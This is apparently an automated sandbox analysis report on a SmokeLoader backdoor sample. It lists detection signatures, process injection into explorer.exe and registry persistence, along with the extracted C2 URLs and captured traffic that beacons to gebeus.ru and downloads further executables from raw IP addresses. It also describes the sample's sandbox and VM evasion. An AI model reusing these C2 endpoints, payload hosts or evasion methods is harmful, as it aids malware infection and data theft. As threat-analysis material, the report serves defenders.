Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1478859
MD5: d76c718ada43477786ef9ca3bba29842
SHA1: c64677ddce626f7b343ee2aee0deb369dd21e0df
SHA256: efa03ac97d2bf5c0020ae8d90cd2977beccca38fe5394d77a4a5482a8190e4ee
Tags: exe, SmokeLoader
Infos:

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D76C718ADA43477786EF9CA3BBA29842)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • C9F5.exe (PID: 1960 cmdline: C:\Users\user\AppData\Local\Temp\C9F5.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • C9F5.exe (PID: 616 cmdline: "C:\Users\user\AppData\Local\Temp\C9F5.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • C9F5.exe (PID: 3372 cmdline: "C:\Users\user\AppData\Local\Temp\C9F5.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ajjwvsd (PID: 4524 cmdline: C:\Users\user\AppData\Roaming\ajjwvsd MD5: D76C718ADA43477786EF9CA3BBA29842)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Author: unknown, Strings: 0x3a61:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Author: unknown, Strings: 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Author: unknown, Strings: 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

      System Summary

      Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Data: Details: C:\Users\user\AppData\Local\Temp\C9F5.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#1757_8yUscnjrUY
      Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Local\Temp\C9F5.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#1757_8yUscnjrUY
      Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: C:\Users\user\AppData\Roaming\ajjwvsd, CommandLine: C:\Users\user\AppData\Roaming\ajjwvsd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ajjwvsd, NewProcessName: C:\Users\user\AppData\Roaming\ajjwvsd, OriginalFileName: C:\Users\user\AppData\Roaming\ajjwvsd, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ajjwvsd, ProcessId: 4524, ProcessName: ajjwvsd
      No Snort rule has matched
      Timestamp: 2024-07-23T06:16:16.946127+0200
      SID: 2019714
      Source Port: 49727
      Destination Port: 80
      Protocol: TCP
      Classtype: Potentially Bad Traffic

      AV Detection

      Source: https://mussangroup.com/wp-content/images/pic1.jpg, Avira URL Cloud: Label: malware
      Source: http://cx5519.com/tmp/index.php, Avira URL Cloud: Label: malware
      Source: http://gebeus.ru/tmp/index.php, Avira URL Cloud: Label: malware
      Source: http://office-techs.biz/tmp/index.php, Avira URL Cloud: Label: malware
      Source: http://evilos.cc/tmp/index.php, Avira URL Cloud: Label: malware
      Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
      Source: gebeus.ru, Virustotal: Detection: 17%
      Source: evilos.cc, Virustotal: Detection: 18%
      Source: mussangroup.com, Virustotal: Detection: 13%
      Source: http://cx5519.com/tmp/index.php, Virustotal: Detection: 11%
      Source: http://gebeus.ru/tmp/index.php, Virustotal: Detection: 18%
      Source: https://mussangroup.com/wp-content/images/pic1.jpg, Virustotal: Detection: 6%
      Source: http://office-techs.biz/tmp/index.php, Virustotal: Detection: 13%
      Source: http://evilos.cc/tmp/index.php, Virustotal: Detection: 17%
      Source: C:\Users\user\AppData\Roaming\ajjwvsd, ReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\ajjwvsd, Virustotal: Detection: 41%
      Source: file.exe, ReversingLabs: Detection: 39%
      Source: file.exe, Virustotal: Detection: 41%
      Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\ajjwvsd, Joe Sandbox ML: detected
      Source: file.exe, Joe Sandbox ML: detected
      Source: C9F5.exe, 00000007.00000003.2902891158.000001C714941000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_437d2e4c-c
      Source: file.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknown, HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49732 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49734 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49735 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49736 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49737 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49738 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49739 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49740 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49741 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49742 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49743 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49745 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49746 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49747 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49748 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49761 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49762 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49764 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49765 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49766 version: TLS 1.2

      Networking

      Source: C:\Windows\explorer.exe, Network Connect: 211.202.224.10 80
      Source: C:\Windows\explorer.exe, Network Connect: 77.221.157.163 80
      Source: C:\Windows\explorer.exe, Network Connect: 107.173.160.139 443
      Source: C:\Windows\explorer.exe, Network Connect: 107.173.160.137 443
      Source: C:\Windows\explorer.exe, Network Connect: 58.151.148.90 80
      Source: C:\Windows\explorer.exe, Network Connect: 64.190.113.113 80
      Source: C:\Windows\explorer.exe, Network Connect: 127.0.0.127 80
      Source: C:\Windows\explorer.exe, Network Connect: 167.235.128.153 443
      Source: C:\Windows\explorer.exe, Network Connect: 185.149.100.242 443
      Source: Malware configuration extractor, URLs: http://evilos.cc/tmp/index.php
      Source: Malware configuration extractor, URLs: http://gebeus.ru/tmp/index.php
      Source: Malware configuration extractor, URLs: http://office-techs.biz/tmp/index.php
      Source: Malware configuration extractor, URLs: http://cx5519.com/tmp/index.php
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Jul 2024 04:16:16 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
      Source: Joe Sandbox View, IP Address: 77.221.157.163
      Source: Joe Sandbox View, IP Address: 107.173.160.139
      Source: Joe Sandbox View, IP Address: 107.173.160.137
      Source: Joe Sandbox View, ASN Name: SKB-ASSKBroadbandCoLtdKR
      Source: Joe Sandbox View, ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU
      Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
      Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
      Source: Joe Sandbox View, ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR
      Source: Joe Sandbox View, JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
      Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 8931
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 155043
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1288
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psrjxmmdjkgukbst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwahwjhjnhccg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnykmijsuyh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://orusljfrmtwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gpbmggcpxwmve.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgmwogluhxcw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnbjwqelfrqfgfg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljcfhqrurbdrtnbx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: gebeus.ru
      Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxlpbwlusmnje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujiloutaffhspsf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfbmduchuitdam.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrnqiqvfjjkw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlrfckdhdpbbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qdkcshccmtjsaxfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: gebeus.ru
      Source: global trafficHTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpvhivgiojy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkeywmaxpqyajg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyaejpplhrtmlm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ochmmwawdfhift.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmrqxjpnnmfq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfkimedsiioubu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsqdyhadbujwtt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gaccdlqnuttqyggb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwyiclkccgwel.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayjiiqvsdwkm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sisxkrjxvfhbylwf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejjtkyjcscj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkihnepnpjlak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: gebeus.ru
